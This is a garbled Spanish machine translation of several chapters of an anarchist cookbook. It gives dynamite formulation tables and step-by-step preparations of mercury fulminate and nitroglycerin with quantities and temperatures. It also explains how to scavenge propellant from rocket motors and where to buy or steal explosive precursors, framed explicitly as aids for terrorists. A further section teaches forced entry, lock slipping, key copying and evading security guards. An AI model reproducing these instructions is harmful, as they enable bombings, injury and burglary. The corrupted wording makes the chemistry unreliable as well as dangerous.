183.ANARCHY 'N' EXPLOSIVOS - Volumen 4 por Exodus

En este volumen especial, vamos a discutir los tipos de dinamita, estos explosivos de gran potencia de ser uno de los más importantes o destructivo de las fórmulas de los anarquistas frente. Tenga en cuenta que algunas de estas mezclas son muy inestables o descarga se enciende, y que la atención debería ser observadas al manejar estas mezclas inestables. Algunas de estas fórmulas de acuerdo con el trinitrotolueno (TNT) y la preparación para la que se da en el volumen 3, dentro de esta serie.

ADVERTENCIA:ESTOS SON REALES Y EXPLOSIVOS PUEDEN CAUSAR LESIONES GRAVES O LA MUERTE POR USO INCORRECTO. NO INTENTE para preparar cualquier COMO EJEMPLO SI NO son plenamente capaces de comprender los peligros y precauciones de estos productos. ESTAS SON LAS FÓRMULAS DE LAS FÓRMULAS DE VERDAD PARA CREAR Estas mezclas y por lo tanto MUY PELIGROSO. USAR BAJO SU PROPIO RIESGO!

Guhr Dynamite:

Ingredientes

• 1 parte de tierra de diatomeas• 3 partes de nitroglicerina

Descripción

Esta dinamita se utiliza principalmente en la limpieza. Es bastante estable, en el ensayo de caída, que explotó por la caída de un peso de 1 kg a través de 12 a 15 cm., O por la caída de un peso de 2 kg a través de 7 cm. El material congelado es menos sensible: una caída de más de 20 cm. con un peso de 1 kg se necesita para explotar, y el peso de 2 kg que es necesario para explotar. Congelada o descongelada, puede ser detonada por disparar con un fusil militar, cuando se mantiene en un cartucho de papel. Generalmente, se detonó con un golpe de acero sobre acero. La velocidad de detonación puede variar en 6650 a 6800 metros por segundo a una carga de densidad de 1 ½ 0.

Extra-Dynamite:

FORMULA 1 FORMULA 271% de nitroglicerina 62% base de nitrato amónico23% base de nitrato amónico 25% de nitroglicerina4% colodión 12% de carbón2% de carbón 1% colodión

Descripción:

Este material es desmenuzable y de plástico entre los dedos. Este material puede ser detonada con cualquier tapón detonante.

Tabla de Fórmulas Dynamite:

INGREDIENTES FUERZA 15% 20% 25% 30% 35% 40% 45% 50% 55% 60%La nitroglicerina 15% 20% 25% 30% 35% 40% 45% 50% 55% 60%Material combustible 20% 19% 18% 17% 16% 15% 14% 14% 15% 16%El nitrato de sodio 64% 60% 56% 52% 48% 44% 40% 35% 29% 23%De calcio o carbonato de magnesio 1% 1% 1% 1% 1% 1% 1% 1% 1%

1%

Tabla de Fórmulas Dynamite Más información:

INGREDIENTES FUERZA

Page 269: 106652012 the Anarchy Cookbook 2000 Es

ORDINARIO CONGELACIÓN DE BAJA 30% 35% 40% 50% 60% 30% 35% 40% 50% 60%La nitroglicerina 15% 20% 22% 27% 35% 13% 17% 17% 21% 27%Los compuestos Nitrosubstitution 0% 0% 0% 0% 0% 3% 4% 4% 5%

6%Nitrato de Amonio 15% 15% 20% 25% 30% 15% 15% 20% 25% 30%El nitrato de sodio 51% 48% 42% 36% 24% 53% 49% 45% 36% 27%Material combustible 18% 16% 15% 11% 10% 15% 14% 13% 12% 9%Carbonato de calcio u óxido de zinc 1% 1% 1% 1% 1% 1% 1% 1% 1%

1%

Tabla maestra de dinamita:

INGREDIENTES FORMULA 1 2 3 4 5 6 7 8 9 10 11 12Nitrato de Amonio 52 53 60 61 66 73 78 83 0 0 0 0Nitrato de potasio 21 0 0 0 0 2.8 5 7 30½ 34 0 0

El nitrato de sodio 0 12 5 3 0 0 0 0 0 0 30½ 24½Nitrato de bario 0 0 0 0 0 0 0 2 4 1 0 0Na o K cloruro 0 0 21 20½ 22 15 8 0 0 0 0 0Oxalato de amonio hidráulicos 16 19 0 0 0 0 0 0 0 0 0 0Cloruro amónico 6 0 0 0 0 0 0 0 0 0 0 0De cereales o harina de madera 0 4 4 7½ 2 1 5 2 0 38½ 39½

40½Glicerina 0 0 0 4 0 0 0 0 0 0 0 0Harina de Corteza Tan gastado 0 0 0 0 0 0 0 0 40 1 0 0Dicromato de potasio 0 0 0 0 0 0 0 0 0 0 5 5Carbonato de Sodio 0 0 0 0 0 0 0 0 ½ ½ 0 0El carbón en polvo 0 0 0 0 4 0 0 0 0 0 0 0Nitrotolueno 0 0 6 1 0 0 0 0 0 0 0 0Dinitrotolueno 0 0 0 0 0 5 0 0 0 0 0 0Trinitrotolueno 0 6 0 0 0 0 0 2 0 0 0 0La nitroglicerina 5 5 4 4 4 3.2 4 4 25 25 25 30

Todas las medidas en porcentajes

Bueno, eso es todo por ahora ... divertirse .... hehehehehe! USAR BAJO SU PROPIO RIESGO!!

EXPLOSIVOS 184.ANARCHY 'N' - Volume 5 por Exodus

Bueno, no lo ha sido desde hace mucho tiempo el volumen 4 de Explosivos 'n' anarquía? Bueno, finalmente se decidió a escribir a otro volumen. Éste estará dedicado a los explosivos extremadamente simples y más accesible e incendiarios que se preparan en casa, o de laboratorio, dependiendo del entorno en el que tienen acceso o están acostumbrados.

Para más información y / o comentarios sobre esta serie de explosivos cada vez más populares, ponerse en contacto conmigo (yo no firmo esto "publicaciones") en el BBS de picardía al xxx-xxx-xxxx sobre la base de mensaje público, que debería ser la lectura de algunas de las solicitudes si los dejas. Y, el número del volumen 6 debe salir antes de lo que el tiempo entre 4 y 5, pero no cuentes con ello.

POLVO A GRANEL:

Polvos a granel son los tipos de pólvora que consisten de nitrocelulosa y una mezcla de otras soluciones químicamente explosivos. Estas fibras de nitrocelulosa están pegadas, pero no se chocó completamente. Algunos contienen poco más que nitrocelulosa, otros contienen, además de nitratos de potasio y bario, alcanfor, vaselina, parafina, negro de humo, almidón, dextrina, dicromato potásico u otras sales oxidantes o disuasorio, y difenilamina para la estabilización, y son de color en una variedad de colores

Page 270: 106652012 the Anarchy Cookbook 2000 Es

brillantes por medio de colorantes coltar. Tres polvos a granel típicos están formados de acuerdo con las fórmulas aproximadas tabulados a continuación:

Nitrocelulosa 84,0 87,0 89,0N% en nitrocelulosa 13,2 12,9 12,9El nitrato de potasio 7 ½ 6.0 6.0Nitrato de bario 7 ½ 2.0 3.0Almidón 0.0 0.0 1.0Queroseno 0.0 4.0 0.0Difenilamina 1.0 1.0 1.0

La mezcla se mezcla en agua caliente y secarse bien. Entonces, o granulada o en polvo hecha por trituración con un bloque de madera y se tamiza a través de un tamiz de 12 mallas. El material se almacena en un recipiente resistente a la humedad para su uso futuro o inmediato.

MERCURIO Fulminate:

Fulminato de mercurio es un explosivo inicio, apareciendo con frecuencia en forma de cristales blancos o grises. Es extremadamente sensible a la iniciación por el calor, la fricción, chispa o llama, y el impacto. Se detona cuando es iniciada por cualquiera de estos medios. Se presiona en los contenedores, por lo general a 3000 psi, para su uso en detonadores y detonadores. Sin embargo, cuando se comprime a una presión cada vez mayor (hasta 30.000 psi), se convierte en "prensada muerto". En esta condición, sólo puede ser detonado por otro agente detonante inicial. Fulminato de mercurio se convierte gradualmente en inertes cuando se almacenan de forma continua por encima de 100 ° F. Un producto de color oscuro de deterioro da evidencia de este efecto. Exfulminate mercurio se almacena bajo el agua, excepto cuando hay peligro de congelación. Después se almacena bajo una mezcla de agua y alcohol.

Preparación de fulminato de mercurio. Cinco gramos de mercurio se añade Ext. 55 cc. de ácido nítrico (gravedad específica 1,42) en un 100-cc. Matraz Erlenmeyer, y la mezcla se deja en reposo sin agitación hasta que el mercurio ha ido en la solución. El líquido ácido se vierte entonces en 50 cc. de 90% de alcohol en un 500-cc. vaso de precipitados en el capó. La temperatura de los aumentos de la mezcla, se inicia una reacción vigorosa, humo blanco salga, y bstals cdata de fulminato de pronto comienzan a precipitar. Humos rojos aparecen y la precipitación del fulminato se hace más rápida, a continuación, humos blancos de nuevo como los moderados de reacción. Después de unos 20 minutos, la reacción ha terminado; se añade agua, y los bstals CDATA se lavó con agua varias veces por decantación hasta que los lavados ya no son ácido al tornasol. El producto consiste en bstals cdata gris-amarillo, y se corresponde con un buen grado de fulminato comercial. Se puede obtener blanco puro y enteramente por disolución en agua amoniacal fuerte, el filtrado, y reprecipitación por adición de 30% de ácido acético. El fulminato puro se separa por filtración, se lavó varias veces con agua fría, y se almacena bajo agua, o, si una cantidad muy pequeña se desea para fines experimentales, se secó en un desecador.

Amatol:

Descripción: amatol es un alto explosivo, de color blanco a beige en color. Es una mezcla de nitrato amónico y TNT, con una eficacia relativa ligeramente mayor que la de TNT solo. Composiciones comunes varían de 80% de nitrato amónico y 20% de TNT al nitrato de amonio 40% y 60% de TNT. Amatol se utiliza como carga explosiva principal de proyectiles de artillería y bombas. Amatol absorbe la humedad y pueden formar compuestos peligrosos con cobre y latón. Por lo tanto, no deben ser alojados en recipientes de dichos metales.

POLVO NEGRO:

Polvos negros queman rápidamente o muy lentamente dependiendo de la composición de dicha mezcla, sin embargo, estos polvos producir humo, a menudo grandes cantidades, y es más útil en aplicaciones donde el humo no es problema. Es lo mejor para la comunicación de fuego y para producir una llama caliente y rápida. Polvo negro se

Page 271: 106652012 the Anarchy Cookbook 2000 Es

utiliza tanto en las cargas de propulsión de proyectiles de metralla, al saludar a los cargos en blanco y fuego, ya que la carga explosiva de los proyectiles y las bombas de práctica, como una carga propulsora en ciertas piezas de pirotecnia, y, ya sea con o sin la adición de otras sustancias que modificar la velocidad de la combustión, en los anillos de los trenes en tiempo y en otras partes de los fusibles. A continuación se muestra una lista de polvos negros y sus composiciones. Nombre Salitre (Brown) Carbón AzufreInglaterra 79 (18) 3Inglaterra 77,4 (17.6) 5Alemania 78 (19) 3Alemania 80 (20) 0Francia 78 (19) 3Fuerte 72 15 13Lente 40 30 30Ordinaire 62 18 20

185.Explosives y propulsores de Éxodo

Casi cualquier ciudad o pueblo de tamaño razonable, tiene una tienda de armas y una o más farmacias. Estos son dos de los lugares que visitan los terroristas potenciales para comprar material explosivo. Todo lo que uno tiene que hacer es saber algo acerca de los usos no explosivos de los materiales. Polvo negro, por ejemplo, se utiliza en las armas de fuego blackpowder. Se presenta en diversos grados "", con cada grado diferente de ser un tamaño ligeramente diferente. El grado de polvo negro depende de lo que el calibre del arma que se utiliza en; un grado fino de polvo podría quemar demasiado rápido en el arma calibre equivocado. La regla es: cuanto menor sea el grado, más rápida será la velocidad de combustión de la pólvora.

POLVO NEGRO

Polvo negro está generalmente disponible en tres grados. Como se dijo antes, cuanto menor sea el grado, el más rápido de las quemaduras de pólvora. Velocidad de combustión es extremadamente importante en bombas. Desde una explosión es un rápido aumento de volumen de gas en un ambiente cerrado, para hacer una explosión, un polvo rápido de combustión es deseable. Los tres grados comunes de polvo negro se enumeran a continuación, junto con el ancho habitual agujero (calibre) de lo que se utilizan in Generalmente, el polvo más rápida combustión, el grado FFF es deseable. Sin embargo, los otros grados y usos se enumeran a continuación:

GRADO PASO ANCHO EJEMPLO DE PISTOLAF ½ 0 o mayor Cannon modelo, y algunos riflesFF 0.36 - ½ 0 Grandes pistolas, rifles pequeñosFFF 0.36 o más pequeño Pistolas; Derringers

El grado FFF es la más rápida combustión, porque el grado más pequeño tiene una mayor superficie o superficie expuesta a la quema del frente de llama. Los grados más grandes también tienen usos que se discutirán más adelante. El rango de precios de polvo negro, por libra, es de aproximadamente $ 8 ½ 0 - $ 9.00. El precio no se ve afectado por el grado, y así uno se ahorra tiempo y trabajo si uno compra el grado más fino de polvo. Los principales problemas con polvo negro son que puede ser encendida accidentalmente por la electricidad estática, y que tiene una tendencia a absorber humedad del aire. Para aplastarla con seguridad, uno que usar una cuchara de plástico y una ensaladera de madera. Tomando un pequeño montón a la vez, él o ella le aplique presión en el polvo a través de la cuchara y lo frota en una serie de derrames cerebrales o círculos, pero no demasiado duro. Es lo suficientemente fina como para usar cuando se trata de tan fina como la harina. La finura, sin embargo, depende de qué tipo de dispositivo que se desea hacer, obviamente, no sería práctico para aplastar en polvo suficiente como para llenar un pie de 1 por 4 pulgadas de tubo de radio. Cualquier adulto puede comprar en polvo negro, ya que cualquiera puede poseer armas de fuego de pólvora negra en los Estados Unidos.

Page 272: 106652012 the Anarchy Cookbook 2000 Es

Pyrodex

Pyrodex es un polvo sintético que se utiliza como polvo negro. Se presenta en los mismos grados, pero es más caro por libra. Sin embargo, un contenedor de una libra de pyrodex contiene más material por volumen que una libra de polvo negro. Es mucho más fácil de aplastar a un polvo muy fino que el polvo negro, y es considerablemente más segura y fiable. Esto es debido a que no se partió por la electricidad estática, como negro puede ser, y es menos inclinado a absorber la humedad. Cuesta alrededor de $ 10.00 por libra. Puede ser aplastado de la misma manera como un polvo negro, o puede ser disuelto en agua hirviendo y se secó.

POLVO DE MOTOR COHETE

Uno de los pasatiempos más interesantes hoy en día es la cohetería modelo. Estes es el mayor productor de equipos de cohetes modelo y motores. Motores de cohetes se compone de un solo grano grande de propelente. Este grano está rodeado por un tubo de cartón bastante pesado. Uno tiene el propulsor por el corte del tubo en sentido longitudinal, y desenvolver como si fuera un rollo de papel toalla. Cuando se hace esto, la arcilla fuego gris en cada extremo del grano propelente debe ser eliminado. Esto se hace generalmente suavemente con un plástico o un cuchillo de latón. El material es excepcionalmente fuerte, y debe ser aplastado para ser utilizado. Al agarrar el grano en el más amplio escenario de un juego de pinzas, y poner el grano y en polvo en una bolsa de plástico, el polvo no se rompen y destruyen todo. Esto debe hacerse a todos los trozos grandes de polvo, y entonces debe ser aplastado como polvo negro. Motores de los cohetes vienen en varios tamaños, que van desde 1/4 A-2T a los motores D increíblemente poderosas. Cuanto mayor sea el motor, el más caro. Motores D vienen en paquetes de tres, y costará alrededor de $ 5.00 por paquete. Motores de cohetes son, quizás, el elemento más útil vende en las tiendas a un terrorista, ya que se puede utilizar tal como está, o puede ser canibalizado por su polvo explosivo.

RIFLE / ESCOPETA EN POLVO

Rifle en polvo y el polvo de la escopeta son realmente lo mismo a partir de un punto de vista práctico. Ellos son ambos propulsores a base de nitrocelulosa. Se les conoce como pólvora en todas las referencias futuras. Pólvora sin humo se hace por la acción de nítrico concentrado y ácido sulfúrico al algodón o algún otro material de celulosa. Este material se disuelve entonces por disolventes y luego reformado en el tamaño de grano deseado. Cuando se trata de pólvora sin humo, el tamaño de grano no es tan importante como la de polvo negro. Tanto grandes como pequeños pólvora sin humo grano quema muy lentamente en comparación con el polvo negro cuando no confinado, pero cuando se limita, la pólvora se quema tanto más caliente y con más expansión de gases, produciendo una mayor presión. Por lo tanto, el proceso de molienda que a menudo es necesario para otros propulsores no es necesario para polvo sin humo. Polvo cuesta alrededor de $ 9,00 por libra. En la mayoría de los estados a cualquier ciudadano con una licencia de conducir válida se puede comprar, ya que hay restricciones en la actualidad pocos rifles o escopetas en los EE.UU. En la actualidad hay controles de identidad en muchos estados en la compra de polvo en un punto de venta. Correo-pedidos no están sujetos a las mismas. Rifle de polvo y pyrodex se pueden comprar por correo, pero los cargos de UPS será alto, debido a las regulaciones del DOT en los envases.

186.Lockpicking III Éxodo

Si se hace necesario abrir una cerradura para entrar en un laboratorio, ganzúa más eficaz del mundo es la dinamita, seguida por un martillo. Hay por desgracia, problemas con el ruido y el exceso de daño estructural con estos métodos. La segunda mejor opción, sin embargo, es un conjunto de ganzúas profesionales.

Se trata, por desgracia, son difíciles de adquirir. Si la puerta a un laboratorio está cerrado, pero la cerradura no está comprometida, entonces hay otras posibilidades. La

Page 273: 106652012 the Anarchy Cookbook 2000 Es

regla aquí es: si uno puede ver el pestillo, se puede abrir la puerta. Existen varios dispositivos que facilitan el desagüe del pestillo de su agujero en la pared. Herramientas dentales, alambre rígido (calibre 20), especialmente doblada de aluminio de las latas, cuchillos de bolsillo, finas y tarjetas de crédito son las herramientas del oficio. La forma en que todas estas herramientas y dispositivos son utiliza es similar: tirar, empujar, o de lo contrario mueva el seguro fuera de su hueco en la pared, permitiendo así que la puerta se abra. Esto se hace deslizando cualquier herramienta que está utilizando detrás del pestillo, y obligando al cierre de nuevo en la puerta.

Cerraduras de pomo de la puerta más modernos tienen dos dedos. El dedo más grande mantiene la puerta cerrada, mientras que el segundo (más pequeño) dedo sólo impide que el primer dedo de ser presionado en cuando (el segundo dedo) es presionado en el catchplate de la puerta. Si se puede separar la placa de captura y la cerradura lo suficientemente lejos, el segundo dedo se desliza lo suficiente como para permitir que el primer dedo que se deslizó.

(Ill 2.11) ___ |} < Pequeña -> (|} <--- El grande (primera) el dedo segundo | ___} < dedo

Algunos métodos para conseguir a través de puertas cerradas son:

1. Otro método de entrada forzada es utilizar un jack de automóvil para forzar el marco alrededor de la puerta fuera de forma, liberando el pestillo o exponiéndolo a los métodos anteriores. Esto es posible porque la mayoría de los marcos de las puertas están diseñados con una ligera cantidad de "dar". En pocas palabras el gato en su posición horizontal a través del marco en las proximidades del pestillo, y el gato hacia fuera. Si el marco es de madera, puede ser posible para eliminar el conector después de cerrar la puerta, que se vuelve a bloquear la puerta y dejar pocas señales de entrada forzada. Esta técnica no funcionará en los edificios de bloques de hormigón, y es difícil justificar una toma automática a los guardias de seguridad.

2. Use un destornillador para hacer palanca o dos la cerradura y la puerta de separación. Mientras que los mantiene separados, tratan de pasar el bloqueo. Destornilladores, aunque no es del todo inocente, son mucho más sutiles que las tomas de automóviles, y mucho más rápido si funcionan. Si usted está en la poco sutil, supongo que una barra de hierro sería demasiado trabajo, pero entonces ¿por qué molestarse para deslizar el bloqueo en absoluto?

3. Encontrar un conjunto de puertas dobles. Ellos son especialmente fáciles de separarlas lo suficiente como para deslizarse.

4. Si el bloqueo es a veces accesible para usted al mismo tiempo abierta, "ajustar" o reemplazar el catchplate para que pueda funcionar más adecuadamente (es decir, trabajar para que se le permite dos dedos, de modo que siempre se puede deslizar). Si lo desea, desmontar el bloqueo y la eliminación de algunos de los pines pueden hacer que sea mucho más fácil de detectar.

5. Si, por alguna extraña razón, las bisagras están de su lado (es decir, la puerta se abre hacia afuera), retire los pernos de la bisagra, siempre que no se detuvo con pestañas soldadas. Desafortunadamente, esto también carece de sutileza, a pesar de su eficacia.

6. Si la puerta no se puede deslizar y usted desea conseguir a través de regularidad, romper el mecanismo. Uso de la fuerza suficiente para hacer la retirada primer dedo mientras que el segundo dedo se retiró romperá algunas cerraduras (por ejemplo, mejores cerraduras) de tal manera que posteriormente puede ser deslizado trivialmente, sin embargo, de lo contrario trabajar en todas las formas normales. El uso de un martillo y / o un destornillador se recomienda. Algunos se debe tener cuidado de no dañar la jamba de la puerta cuando se trata de esto en las puertas cerradas y con llave, para no atraer la atención de los usuarios o propietarios o de cerrajería o de IVA de la policía.

7. Mire a su alrededor en los escritorios. La gente muy a menudo dejar las llaves a las cosas sensibles en ellos o en otros lugares obvios. Especialmente claves para

Page 274: 106652012 the Anarchy Cookbook 2000 Es

compartir los recursos críticos, como salas de la oferta, que suelen ser clave limitado, pero que todos tienen acceso. Tome las medidas con un micrómetro, o hacer un seguimiento (laicos clave en el papel y hacer garabatos en la parte superior), o ser sordo y hacer una impresión en cera. Obtener espacios en blanco para el tipo de clave (puede ser muy difícil para los mejores cerraduras, yo no voy a entrar en los métodos, aparte de decir que si usted puede obtener las claves de otros hechos de la misma pieza, a menudo se pueden hacer maravillas con un poco de ingenio) y utilizar un archivo para reproducir la clave. Utilizando un micrómetro funciona mejor: las llaves que hizo a partir de mediciones de micro son más propensos a trabajar de forma constante que las claves hechas por cualquier otro método. Si nos los trazados, es probable que hacer varios intentos antes de obtener una clave que funciona de forma fiable. Además, si se puede "tomar prestado" el cilindro y el desmonte, los niveles de pin se puede obtener y construir las llaves.

8. Cerraduras simples, como los escritorios, se pueden recoger con bastante facilidad. Muchos escritorios tienen simples tres o cuatro bloqueos pasador de sólo unos pocos niveles, y se puede consistentemente recogió por una persona paciente en pocos minutos. Un pequeño destornillador y un clip de papel va a hacer maravillas en manos expertas. Aplicar un par ligero al bloqueo en el sentido de abrir con el destornillador. A continuación, "rake" los pines con el clip de papel desplegado. Con la práctica, vamos a aplicar la suficiente presión con el destornillador que las clavijas se alineen correctamente (que van a ponerse en el cilindro en algún lugar entre la parte superior e inferior de su recorrido normal), y una vez que están todos alineados, una presión adicional sobre el destornillador a continuación, se abrirá la cerradura. Esto, junto con (7) puede ser muy eficaz. Esto funciona mejor con las cerraduras antiguas o mecanizada descuidada que tienen una buena cantidad de juegos en el cilindro. Incluso mayores cerraduras de calidad puede ser recogido de esta manera, si sus cilindros se han desgastado lo suficiente como para dar suficiente juego para permitir que los pins para coger de forma fiable. Incluso con un bloqueo de la calidad de bien nacido, sin embargo, por lo general toma un * mucho * de la paciencia.

9. Servicios de custodia a menudo se abren todo a la vista y luego tomar descansos. Aproveche al máximo sus oportunidades.

10. No importa lo que estás haciendo, mira como si estar allí. Nada hace sospechar a nadie más que a alguien merodeando por, obviamente, tratando de pasar desapercibido. Si hay varios de ustedes, tienen algún método aparente advertencia inocua y normal ("Oye, tonto! ¿Qué hora es?") Por lo que pueden conseguir cualquier cosa sospechosa guardar. No viajar en grandes grupos a las 3AM. Recuerde, más de un ladrón de coches ha logrado recabar la ayuda de un policía en la fractura en un coche. Recuerde que este. La gente de seguridad por lo general * como * para ayudar a la gente. No les haga sospechar o molestar a ellos. Si se queda en la gente de seguridad, trate de asegurarse de que no habrá ningún robo o allanamientos informó que al día siguiente ...

11. Tenga en cuenta las posibilidades de las llaves maestras. A menudo, las cerraduras en un edificio o departamento tendrá un maestro común (llaves del edificio de entrada son una excepción común). Desmontar algunos bloqueos de diferentes lugares que deben tener los maestros comunes, medir las longitudes de pines diferentes en cada uno, y encontrar las longitudes en común. Experimento. A continuación, entrar en los lugares que va a * realmente * curiosidad.

12. Las teclas de control son la diversión, también. Estas teclas permiten al usuario retirar el núcleo de la cerradura, y son generalmente maestros. (Un par de pinzas de punta fina o una herramienta similar se puede utilizar para abrir la cerradura, si lo desea.)

DESLIZAMIENTO DE UNA CERRADURA

El mejor material que hemos encontrado para resbala hasta el momento es lámina de cobre suave. Es bastante flexible, por lo que se puede trabajar en jambas fácilmente, y pueden ser pre-doblado según sea necesario. En el plano de la lámina, sin embargo, es bastante fuerte, y tira muy bien. Por supuesto, si son lo suficientemente flexibles, tarjetas de crédito, identificaciones de estudiantes, etc, funcionan bien en los bloqueos que se han hecho slippable si la jamba de la puerta es lo suficientemente

Page 275: 106652012 the Anarchy Cookbook 2000 Es

ancho. Maravillosamente sutil, rápido y eficaz deliciosamente. No salgas de casa sin uno.

(IL n º 1)

La hoja debe ser plegado para producir un L, J, o un dispositivo en forma de U que tiene este aspecto: ________________________________________ / ________________________________________ | | | | | En forma de L | | | | | _ |

(Illinois # 2) _____________________________ / ___________________________ | | | | | En forma de J | | | | ________ \ ________ |

(Illinois # 3) _____________________ / ___________________ | | | | | | | En forma de U | | | | ____________________ \ ____________________ |

Nos apresuramos a añadir que en muchos colegios y universidades de la mayoría o tienen políticas muy estrictas sobre la posesión no autorizada de llaves. A lo sumo, es al menos un motivo de expulsión, incluso sin presentar cargos criminales. No se deje atrapar con las teclas! Los caseros son particularmente evidente, ya que no tienen los sellos usuales y las marcas que los cerrajeros ponen a nombre y número de las teclas.]

También debemos señalar que si usted hace un fastidio de sí mismo, hay varias cosas desagradables que se pueden hacer para coger usted y / o a reducir la velocidad. Por ejemplo, poniendo mecanismos especiales pasador en, cerraduras se pueden hacer para atrapar cualquier clave utilizada para abrirlos. Si pierde uno de esta manera, ¿qué puedo decir? Por lo menos no dejar huellas en él. O asegurarse de que son de otra persona. Daño en exceso también puede tentar a los poderes fácticos para volver a codificar.

187.Chemical equivalente Lista II de Éxodo

Cualquier persona puede adquirir muchos productos químicos en las ferreterías, supermercados y almacenes de la droga para obtener los materiales para fabricar explosivos u otros compuestos peligrosos. Un aspirante a terrorista no haría más que necesitan una camioneta y algo de dinero para adquirir muchos de los productos químicos mencionados aquí.

Químico Utilizados en Disponible enEl alcohol, el etílico Bebidas Alcohólicas Tiendas de bebidas alcohólicas Disolventes: 95% min para ambos

Ferreterías

Page 276: 106652012 the Anarchy Cookbook 2000 Es

Amoníaco Amoníaco CLEAR Supermercados o 7-ElevenAmonio Nirate Instant-Cold Pak Tiendas de drogas Fertilizantes Tiendas de suministros médicosÓxido nitroso Presurización Whip Cream Tiendas de alimentación del partido Poppers (como el CO² CTG). Tiendas de cabezaMagnesio Firestarters Excedentes o Camping TiendasLecitina Vitaminas Las farmacias o drogueríasAceite mineral Cocina, Laxante Supermercados o tiendas de DrogasMercurio Termómetros de Mercurio Supermercados FerreteríasÁcido sulfúrico Las baterías sin carga de coches

Tiendas de automociónGlicerina Las farmacias o drogueríasAzufre Jardinería Jardín o Hardware StoreCarbón vegetal Parrillas de carbón Supermercados Tiendas de jardineríaEl nitrato de sodio Fertilizante Tiendas de jardineríaCelulosa (del algodón) Primeros Auxilios Tiendas de drogas Tiendas de suministros médicosEstroncio Nitrato Carretera Bengalas Excedentes o Auto TiendasFuel Oil Las estufas de queroseno Excedentes o Camping TiendasGas envasado Estufas de propano Excedentes de las tiendas de campingPermanganato de potasio Purificación de Agua Instalaciones de depuraciónHexamina o metenamina Estufas hexamina Excedentes o Camping Tiendas* Ácido Nítrico Limpieza de impresión Imprentas Placas Tiendas de fotografíaYodo + Desinfectante (Tinture) Farmacia, OSCOPerclorato sódico Solidox Pellets Ferreterías Antorchas de cortar (impuro)

* El ácido nítrico es muy difícil de encontrar hoy en día. Por lo general se robada por fabricantes de bombas, o hecha por el procedimiento descrito en una sección posterior. Una concentración deseada para la fabricación de explosivos alrededor del 70%.

+ El yodo se venden en las farmacias no suele ser la forma pura cristalina que se desea para producir cristales de amonio triyoduro. Para obtener la forma pura, por lo general deben ser adquiridos por prescripción de un doctor, pero esto puede ser costoso. Una vez más, el robo es el medio que los terroristas de provocar.

188.Nitroglycerin II de Éxodo

La nitroglicerina es uno de los explosivos más sensibles, si no es el más sensible. Aunque es posible hacerlo de forma segura, es difícil. Más de un joven anarquista se ha muerto o gravemente herido al tratar de hacer las cosas. Cuando las fábricas Nobel de hacerlo, muchas personas murieron por las explosiones de la fábrica a toda frecuentes. Por lo general, tan pronto como se hace, se convierte en una sustancia más segura, como dinamita. Un idiota que intenta hacer que la nitroglicerina se utiliza el siguiente procedimiento:

MATERIAL:• Agua destilada• Sal de mesa• Bicarbonato de sodio• El ácido nítrico concentrado (13 ml)• El ácido sulfúrico concentrado (39 ml)• Glicerina

EQUIPO:

Page 277: 106652012 the Anarchy Cookbook 2000 Es

• Gotero • 100 ml Vaso • 200-300 ml Vasos (2)• Contenedor de hielo de baño (un cubo de plástico sirve bien)• Centígrados Termómetro • Papel de tornasol azul

1. Colocar 150 ml de agua destilada en una de las cubetas 200-300 ml.2. En el vaso de precipitados ml otro 200-300, colocar 150 ml de agua destilada y

aproximadamente una cucharada de bicarbonato de sodio, y se agita hasta que el bicarbonato de sodio se disuelve. No ponga el bicarbonato de sodio tanto en el agua por lo que algunos no se disuelve.

3. Crear un baño de hielo por medio de llenado del contenedor baño de hielo con hielo, y la adición de sal de mesa. Esto hará que el hielo se derrita, bajando la temperatura global.

4. Coloque el vaso de precipitados de 100 ml en el baño de hielo, y verter 13 ml de ácido nítrico concentrado en el vaso de precipitados de 100 ml. Asegurarse de que el vaso no se derrame en el baño de hielo, y que el baño de hielo no se desbordará en el vaso cuando haya más materiales se añaden a la misma. Asegúrese de tener un gran recipiente de baño de hielo suficiente para añadir más hielo. Llevar la temperatura del ácido a alrededor de 20 ° C o menos.

5. Cuando el ácido nítrico es tan frío como se ha dicho, lenta y cuidadosamente agrega el 39 ml de ácido sulfúrico concentrado al ácido nítrico. Mezclar los dos ácidos juntos, y enfriar los ácidos mezclados a 10 ° C. Es una buena idea para comenzar otro baño de hielo para hacer esto.

6. Con el cuentagotas, lentamente puso la glicerina en los ácidos mezclados, una gota a la vez. Mantener el termómetro en la parte superior de la mezcla en donde los ácidos mixtos y glicerina se encuentran.

NO permita que la temperatura para obtener por encima de 30 ° centígradosSi la temperatura sube encima de esta temperatura, ¡cuidado!!

7. La glicerina se iniciará en nitrato inmediatamente, y la temperatura inmediatamente empiezan a elevarse. Añadir glicerina hasta que hay una capa delgada de glicerina en la parte superior de los ácidos mixtos. Es siempre el más seguro de hacer cualquier explosivo en pequeñas cantidades.

8. Agitar los ácidos mixtos y glicerina durante los primeros diez minutos de nitración, la adición de hielo y sal al baño de hielo para mantener la temperatura de la solución en el vaso de precipitados de 100 ml muy por debajo de 30 ° C. Por lo general, la nitroglicerina se formará en la parte superior de la solución de ácido mixto, y el ácido sulfúrico concentrado absorberá el agua producida por la reacción.

9. Cuando la reacción ha terminado, y cuando la nitroglicerina es muy por debajo de 30 ° C, lenta y cuidadosamente vierte la solución de nitroglicerina y ácido mezclado en el agua destilada en el vaso de precipitados en el paso 1. La nitroglicerina debe depositarse en el fondo del vaso, y la solución de agua-ácido en la parte superior puede ser vertido y eliminados. Escurrir tanto de la solución de ácido-agua como sea posible sin perturbar la nitroglicerina.

10. Retire con cuidado la nitroglicerina con un gotero limpio, y colocarlo en el recipiente en el paso 2. La solución de bicarbonato de sodio elimina la mayor parte del ácido, que hará que la nitroglicerina más estable y menos probable a explotar sin razón, que lo puede hacer. Prueba de la nitroglicerina con el papel tornasol hasta que el tornasol azul. Repetir este paso, si es necesario, y utilizar nuevos soluciones de bicarbonato de sodio como en el paso 2.

11. Cuando la nitroglicerina es el ácido-libre como sea posible, guárdelo en un recipiente limpio en un lugar seguro. El mejor lugar para guardar la nitroglicerina es lejos de ser vivo, o de cualquier cosa de cualquier valor. La nitroglicerina puede explotar sin razón aparente, incluso si se almacena en un lugar fresco y seguro.

Page 278: 106652012 the Anarchy Cookbook 2000 Es

189.Cellulose nitrato por Exodus

